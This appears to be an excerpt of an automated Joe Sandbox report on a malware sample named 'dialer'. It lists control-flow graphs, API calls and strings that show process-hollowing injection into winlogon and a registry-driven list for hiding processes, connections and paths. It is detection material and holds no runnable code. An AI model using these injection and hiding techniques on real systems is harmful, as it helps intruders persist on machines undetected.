14000290b-140002914 GetProcessHeap 254->260 261 14000282d-140002839 254->261 255->196 258->259 265 140002a20-140002a32 258->265 262 140002a52-140002a5d HeapFree 259->262 260->262 261->260 266 14000283f-14000284b 261->266 262->196 268 140002624-140002633 call 1400010c0 264->268 269 140002638-14000263f 264->269 270 140002a34-140002a36 265->270 271 140002a38-140002a40 265->271 266->260 272 140002851-14000285c 266->272 268->196 269->245 270->271 276 140002a44 call 1400016cc 270->276 271->259 277 140002a42 271->277 273 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 272->273 274 14000285e-140002869 272->274 273->260 274->260 278 14000286f-14000287c call 140001c88 274->278 276->259 277->265 278->260
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                          • String ID: SOFTWARE$dialerstager$open
                                                          • API String ID: 3276259517-3931493855
                                                          • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                          • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                          • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                          • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                          Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 285 140001c88-140001cb8 286 140001cbb-140001cc8 285->286 287 140001e8c-140001e91 286->287 288 140001cce-140001d25 CreateProcessW 286->288 287->286 291 140001e97 287->291 289 140001e88 288->289 290 140001d2b-140001d5a VirtualAllocEx 288->290 289->287 292 140001e5d-140001e60 290->292 293 140001d60-140001d7b WriteProcessMemory 290->293 294 140001e99-140001eb9 291->294 295 140001e62-140001e76 OpenProcess 292->295 296 140001e85 292->296 293->292 297 140001d81-140001d87 293->297 295->289 298 140001e78-140001e83 TerminateProcess 295->298 296->289 299 140001dd2-140001def VirtualAlloc 297->299 300 140001d89 297->300 298->289 299->292 301 140001df1-140001e07 GetThreadContext 299->301 302 140001d8c-140001dba WriteProcessMemory 300->302 301->292 304 140001e09-140001e2e WriteProcessMemory 301->304 302->292 303 140001dc0-140001dcc 302->303 303->302 305 140001dce 303->305 304->292 306 140001e30-140001e4c SetThreadContext 304->306 305->299 306->292 307 140001e4e-140001e5b ResumeThread 306->307 307->292 308 140001eba-140001ebf 307->308 308->294
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                          • String ID: @
                                                          • API String ID: 3462610200-2766056989
                                                          • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                          • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                          • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                          • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                          Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                          • String ID: dialersvc64
                                                          • API String ID: 4184240511-3881820561
                                                          • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                          • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                          • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                          • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                          Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Delete$CloseEnumOpen
                                                          • String ID: SOFTWARE\dialerconfig
                                                          • API String ID: 3013565938-461861421
                                                          • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                          • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                          • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                          • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                          Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: File$Write$CloseCreateHandle
                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                          • API String ID: 148219782-3440882674
                                                          • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                          • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                          • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                          • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                          Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2595748238.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001D.00000002.2595209282.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596283366.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001D.00000002.2596816381.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: ntdll.dll
                                                          • API String ID: 1646373207-2227199552
                                                          • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                          • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                          • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                          • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                          Execution Graph

                                                          Execution Coverage:1.7%
                                                          Dynamic/Decrypted Code Coverage:94.9%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:118
                                                          Total number of Limit Nodes:16
                                                          execution_graph 14790 1fc603828c8 14792 1fc6038290e 14790->14792 14791 1fc60382970 14792->14791 14794 1fc60383844 14792->14794 14795 1fc60383866 14794->14795 14796 1fc60383851 StrCmpNIW 14794->14796 14795->14792 14796->14795 14797 1fc60383ab9 14802 1fc60383a06 14797->14802 14798 1fc60383a56 VirtualQuery 14801 1fc60383a70 14798->14801 14798->14802 14799 1fc60383a8a VirtualAlloc 14800 1fc60383abb GetLastError 14799->14800 14799->14801 14800->14802 14802->14798 14802->14799 14802->14801 14803 1fc60381abc 14808 1fc60381628 GetProcessHeap HeapAlloc 14803->14808 14805 1fc60381ad2 Sleep SleepEx 14806 1fc60381acb 14805->14806 14806->14805 14807 1fc60381598 StrCmpIW StrCmpW 14806->14807 14807->14806 14852 1fc60381268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14808->14852 14810 1fc60381650 14853 1fc60381268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14810->14853 14812 1fc60381661 14854 1fc60381268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14812->14854 14814 1fc6038166a 14855 1fc60381268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14814->14855 14816 1fc60381673 14817 1fc6038168e RegOpenKeyExW 14816->14817 14818 1fc603818a6 14817->14818 14819 1fc603816c0 RegOpenKeyExW 14817->14819 14818->14806 14820 1fc603816e9 14819->14820 14821 1fc603816ff RegOpenKeyExW 14819->14821 14862 1fc603812bc RegQueryInfoKeyW 14820->14862 14823 1fc6038173a RegOpenKeyExW 14821->14823 14824 1fc60381723 14821->14824 14827 1fc60381775 RegOpenKeyExW 14823->14827 14828 1fc6038175e 14823->14828 14856 1fc6038104c RegQueryInfoKeyW 14824->14856 14830 1fc60381799 14827->14830 14831 1fc603817b0 RegOpenKeyExW 14827->14831 14829 1fc603812bc 16 API calls 14828->14829 14833 1fc6038176b RegCloseKey 14829->14833 14834 1fc603812bc 16 API calls 14830->14834 14835 1fc603817d4 14831->14835 14836 1fc603817eb RegOpenKeyExW 14831->14836 14833->14827 14837 1fc603817a6 RegCloseKey 14834->14837 14838 1fc603812bc 16 API calls 14835->14838 14839 1fc60381826 RegOpenKeyExW 14836->14839 14840 1fc6038180f 14836->14840 14837->14831 14841 1fc603817e1 RegCloseKey 14838->14841 14843 1fc6038184a 14839->14843 14844 1fc60381861 RegOpenKeyExW 14839->14844 14842 1fc6038104c 6 API calls 14840->14842 14841->14836 14848 1fc6038181c RegCloseKey 14842->14848 14845 1fc6038104c 6 API calls 14843->14845 14846 1fc60381885 14844->14846 14847 1fc6038189c RegCloseKey 14844->14847 14849 1fc60381857 RegCloseKey 14845->14849 14850 1fc6038104c 6 API calls 14846->14850 14847->14818 14848->14839 14849->14844 14851 1fc60381892 RegCloseKey 14850->14851 14851->14847 14852->14810 14853->14812 14854->14814 14855->14816 14857 1fc603811b5 RegCloseKey 14856->14857 14858 1fc603810bf 14856->14858 14857->14823 14858->14857 14859 1fc603810cf RegEnumValueW 14858->14859 14860 1fc60381125 14859->14860 14860->14857 14860->14859 14861 1fc6038114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14860->14861 14861->14860 14863 1fc60381327 GetProcessHeap HeapAlloc 14862->14863 14864 1fc6038148a RegCloseKey 14862->14864 14865 1fc60381476 GetProcessHeap HeapFree 14863->14865 14866 1fc60381352 RegEnumValueW 14863->14866 14864->14821 14865->14864 14868 1fc603813a5 14866->14868 14868->14865 14868->14866 14869 1fc6038141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14868->14869 14870 1fc603813d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14868->14870 14871 1fc6038152c 14868->14871 14869->14868 14870->14869 14872 1fc6038157c 14871->14872 14875 1fc60381546 14871->14875 14872->14868 14873 1fc60381565 StrCmpW 14873->14875 14874 1fc6038155d StrCmpIW 14874->14875 14875->14872 14875->14873 14875->14874 14876 1fc6038554d 14878 1fc60385554 14876->14878 14877 1fc603855bb 14878->14877 14879 1fc60385637 VirtualProtect 14878->14879 14880 1fc60385671 14879->14880 14881 1fc60385663 GetLastError 14879->14881 14881->14880 14882 1fc5ff9273c 14883 1fc5ff9276a 14882->14883 14884 1fc5ff927c5 VirtualAlloc 14883->14884 14887 1fc5ff928d4 14883->14887 14885 1fc5ff927ec 14884->14885 14884->14887 14886 1fc5ff92858 LoadLibraryA 14885->14886 14885->14887 14886->14885 14888 1fc60385cf0 14889 1fc60385cfd 14888->14889 14890 1fc60385d09 14889->14890 14897 1fc60385e1a 14889->14897 14891 1fc60385d3e 14890->14891 14892 1fc60385d8d 14890->14892 14893 1fc60385d66 SetThreadContext 14891->14893 14893->14892 14894 1fc60385efe 14896 1fc60385f1e 14894->14896 14910 1fc603843e0 14894->14910 14895 1fc60385e41 VirtualProtect FlushInstructionCache 14895->14897 14906 1fc60384df0 GetCurrentProcess 14896->14906 14897->14894 14897->14895 14900 1fc60385f23 14901 1fc60385f77 14900->14901 14902 1fc60385f37 ResumeThread 14900->14902 14914 1fc60387940 14901->14914 14903 1fc60385f6b 14902->14903 14903->14900 14905 1fc60385fbf 14909 1fc60384e0c 14906->14909 14907 1fc60384e22 VirtualProtect FlushInstructionCache 14907->14909 14908 1fc60384e53 14908->14900 14909->14907 14909->14908 14912 1fc603843fc 14910->14912 14911 1fc6038445f 14911->14896 14912->14911 14913 1fc60384412 VirtualFree 14912->14913 14913->14912 14916 1fc60387949 _log10_special 14914->14916 14915 1fc60387954 14915->14905 14916->14915 14919 1fc60388320 14916->14919 14918 1fc60388157 14918->14905 14922 1fc60388331 capture_current_context 14919->14922 14920 1fc6038833a RtlLookupFunctionEntry 14921 1fc60388389 14920->14921 14920->14922 14921->14918 14922->14920 14922->14921

                                                          Executed Functions

                                                          Function 000001FC60381628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 106492572-2879589442
                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                          • Instruction ID: 8ad77760299e517f80802a4e228a9493f3353ba385b2ec3dcea66b4f68325b7f
                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                          • Instruction Fuzzy Hash: F9712E36359E1A86EB109F65E9916E92378F7C4BAAF001131DE4EA7B68EF34C454D380
                                                          Function 000001FC60383790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID: wr
                                                          • API String ID: 1092925422-2678910430
                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                          • Instruction ID: 9fd2515007f237f2d4f20d5fb44b4a6c4dcf3471bf20efd49ddecb5c355701ee
                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                          • Instruction Fuzzy Hash: FB113C36749B4682EF149B11E5046A963B0F7C8BA6F440039EE8D97754EF3DC505D784
                                                          Function 000001FC60385B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 57 1fc60385b30-1fc60385b57 58 1fc60385b59-1fc60385b68 57->58 59 1fc60385b6b-1fc60385b76 GetCurrentThreadId 57->59 58->59 60 1fc60385b78-1fc60385b7d 59->60 61 1fc60385b82-1fc60385b89 59->61 62 1fc60385faf-1fc60385fc6 call 1fc60387940 60->62 63 1fc60385b9b-1fc60385baf 61->63 64 1fc60385b8b-1fc60385b96 call 1fc60385960 61->64 67 1fc60385bbe-1fc60385bc4 63->67 64->62 70 1fc60385c95-1fc60385cb6 67->70 71 1fc60385bca-1fc60385bd3 67->71 75 1fc60385cbc-1fc60385cdc GetThreadContext 70->75 76 1fc60385e1f-1fc60385e30 call 1fc603874bf 70->76 73 1fc60385bd5-1fc60385c18 call 1fc603885c0 71->73 74 1fc60385c1a-1fc60385c8d call 1fc60384510 call 1fc603844b0 call 1fc60384470 71->74 86 1fc60385c90 73->86 74->86 79 1fc60385e1a 75->79 80 1fc60385ce2-1fc60385d03 75->80 91 1fc60385e35-1fc60385e3b 76->91 79->76 80->79 90 1fc60385d09-1fc60385d12 80->90 86->67 93 1fc60385d14-1fc60385d25 90->93 94 1fc60385d92-1fc60385da3 90->94 95 1fc60385efe-1fc60385f0e 91->95 96 1fc60385e41-1fc60385e98 VirtualProtect FlushInstructionCache 91->96 102 1fc60385d27-1fc60385d3c 93->102 103 1fc60385d8d 93->103 97 1fc60385e15 94->97 98 1fc60385da5-1fc60385dc3 94->98 100 1fc60385f1e-1fc60385f2a call 1fc60384df0 95->100 101 1fc60385f10-1fc60385f17 95->101 104 1fc60385ec9-1fc60385ef9 call 1fc603878ac 96->104 105 1fc60385e9a-1fc60385ea4 96->105 98->97 106 1fc60385dc5-1fc60385e10 call 1fc60383900 call 1fc603874dd 98->106 120 1fc60385f2f-1fc60385f35 100->120 101->100 108 1fc60385f19 call 1fc603843e0 101->108 102->103 110 1fc60385d3e-1fc60385d88 call 1fc60383970 SetThreadContext 102->110 103->97 104->91 105->104 111 1fc60385ea6-1fc60385ec1 call 1fc60384390 105->111 106->97 108->100 110->103 111->104 123 1fc60385f77-1fc60385f95 120->123 124 1fc60385f37-1fc60385f75 ResumeThread call 1fc603878ac 120->124 125 1fc60385f97-1fc60385fa6 123->125 126 1fc60385fa9 123->126 124->120 125->126 126->62
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                          • Instruction ID: b355908382411a01eef0aff919b41bb1c9f08d6740e9c814e59fdab2b590b51c
                                                          • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                          • Instruction Fuzzy Hash: 0FD1AB36249B8982DA70DB06E5943AA77B0F3C8B95F100176EACE97BA5DF3CC541DB40
                                                          Function 000001FC603850D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 129 1fc603850d0-1fc603850fc 130 1fc6038510d-1fc60385116 129->130 131 1fc603850fe-1fc60385106 129->131 132 1fc60385127-1fc60385130 130->132 133 1fc60385118-1fc60385120 130->133 131->130 134 1fc60385141-1fc6038514a 132->134 135 1fc60385132-1fc6038513a 132->135 133->132 136 1fc60385156-1fc60385161 GetCurrentThreadId 134->136 137 1fc6038514c-1fc60385151 134->137 135->134 139 1fc6038516d-1fc60385174 136->139 140 1fc60385163-1fc60385168 136->140 138 1fc603856d3-1fc603856da 137->138 141 1fc60385176-1fc6038517c 139->141 142 1fc60385181-1fc6038518a 139->142 140->138 141->138 143 1fc60385196-1fc603851a2 142->143 144 1fc6038518c-1fc60385191 142->144 145 1fc603851a4-1fc603851c9 143->145 146 1fc603851ce-1fc60385225 call 1fc603856e0 * 2 143->146 144->138 145->138 151 1fc60385227-1fc6038522e 146->151 152 1fc6038523a-1fc60385243 146->152 153 1fc60385236 151->153 154 1fc60385230 151->154 155 1fc60385255-1fc6038525e 152->155 156 1fc60385245-1fc60385252 152->156 158 1fc603852a6-1fc603852aa 153->158 157 1fc603852b0-1fc603852b6 154->157 159 1fc60385260-1fc60385270 155->159 160 1fc60385273-1fc60385298 call 1fc60387870 155->160 156->155 162 1fc603852e5-1fc603852eb 157->162 163 1fc603852b8-1fc603852d4 call 1fc60384390 157->163 158->157 159->160 169 1fc6038532d-1fc60385342 call 1fc60383cc0 160->169 170 1fc6038529e 160->170 164 1fc60385315-1fc60385328 162->164 165 1fc603852ed-1fc6038530c call 1fc603878ac 162->165 163->162 172 1fc603852d6-1fc603852de 163->172 164->138 165->164 176 1fc60385344-1fc6038534c 169->176 177 1fc60385351-1fc6038535a 169->177 170->158 172->162 176->158 178 1fc6038536c-1fc603853ba call 1fc60388c60 177->178 179 1fc6038535c-1fc60385369 177->179 182 1fc603853c2-1fc603853ca 178->182 179->178 183 1fc603854d7-1fc603854df 182->183 184 1fc603853d0-1fc603854bb call 1fc60387440 182->184 186 1fc603854e1-1fc603854f4 call 1fc60384590 183->186 187 1fc60385523-1fc6038552b 183->187 195 1fc603854bd 184->195 196 1fc603854bf-1fc603854ce call 1fc60384060 184->196 201 1fc603854f6 186->201 202 1fc603854f8-1fc60385521 186->202 188 1fc60385537-1fc60385546 187->188 189 1fc6038552d-1fc60385535 187->189 193 1fc60385548 188->193 194 1fc6038554f 188->194 189->188 192 1fc60385554-1fc60385561 189->192 198 1fc60385564-1fc603855b9 call 1fc603885c0 192->198 199 1fc60385563 192->199 193->194 194->192 195->183 206 1fc603854d0 196->206 207 1fc603854d2 196->207 208 1fc603855c8-1fc60385661 call 1fc60384510 call 1fc60384470 VirtualProtect 198->208 209 1fc603855bb-1fc603855c3 198->209 199->198 201->187 202->183 206->183 207->182 214 1fc60385671-1fc603856d1 208->214 215 1fc60385663-1fc60385668 GetLastError 208->215 214->138 215->214
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                          • Instruction ID: 63dab799a15c071bef3edc2dda8b77e7f2cd8ee53e2c1cec7f0c673abd718ffa
                                                          • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                          • Instruction Fuzzy Hash: C502EA3225DB8986EB60CB55E5803AAB7B0F3C5791F100075EA8E97BA8DF7CC444DB40
                                                          Function 000001FC603839E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocQuery
                                                          • String ID:
                                                          • API String ID: 31662377-0
                                                          • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                          • Instruction ID: 6dab15b1cdce50869f73efc2d50e8fe0844cc7e6090b35a92a13282c9d4dbf3a
                                                          • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                          • Instruction Fuzzy Hash: B031873225DA8981EB34DB15E1513EE66B0F3C8795F100575F5CEA6B98DF7CC1809B80
                                                          Function 000001FC6038328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0
                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                          • Instruction ID: 1477dc234332796279ddae0702f850dd4017f6200540c899711349a0c19b1589
                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                          • Instruction Fuzzy Hash: EA118B3469C60B82FB609B21FB453F922B4B7C4367F404174A91EE1791EFB8C048A2C0
                                                          Function 000001FC60384DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                          • String ID:
                                                          • API String ID: 3733156554-0
                                                          • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                          • Instruction ID: fb4b7379a509eb6a1fa3529b70d190298965e5b9636a098cc8c2cc912675f607
                                                          • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                          • Instruction Fuzzy Hash: B9F0303625CB09C0D630DB46E5453AAABB0F3C87E5F140171FA8D93B69CA3CC5809B80
                                                          Function 000001FC5FF9273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
